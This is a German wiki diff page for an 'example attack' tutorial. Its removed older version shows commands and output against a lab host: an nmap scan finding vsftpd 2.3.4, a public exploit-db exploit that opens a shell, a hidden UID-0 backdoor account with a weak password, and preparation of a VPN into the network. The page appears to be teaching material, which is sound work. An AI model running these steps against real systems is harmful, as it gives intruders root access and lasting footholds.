Exemplarischer Angriff: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Der Seiteninhalt wurde durch einen anderen Text ersetzt: „*vsftp4-angriff *vpn-eskalation“)
Markierung: Ersetzt
 
(21 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
=Beispiel=
+
*[[vsftp4-angriff]]
*nmap -sV 10.80.100.105 -p 21
+
*[[vpn-eskalation]]
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST
 
Nmap scan report for 10.80.100.105
 
Host is up (0.00056s latency).
 
 
 
PORT  STATE SERVICE VERSION
 
21/tcp open  ftp    vsftpd 2.3.4
 
Service Info: OS: Unix
 
=Nach Exploit googlen=
 
;vsftpd 2.3 4 exploit-db
 
=Exploit finden=
 
*https://www.exploit-db.com/exploits/49757
 
=Exploit ausführen=
 
*python vsftp.py 10.80.100.105
 
Success, shell opened
 
Send `exit` to quit shell
 
=Läuft ssh?=
 
*netstat -lntp | grep 22
 
tcp6  0      0 :::22  :::*  LISTEN      4360/sshd
 
=User anlegen=
 
*useradd -m -o -u 0 -s /bin/bash -d /var/www www
 
*passwd www
 
Enter new UNIX password: www2www
 
Retype new UNIX password: www2www
 
passwd: password updated successfully
 
 
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
 
*apt-get install ppp
 

Aktuelle Version vom 25. Oktober 2021, 16:27 Uhr

Abgerufen von „http://wiki.ixheim.de/index.php?title=Exemplarischer_Angriff&oldid=28935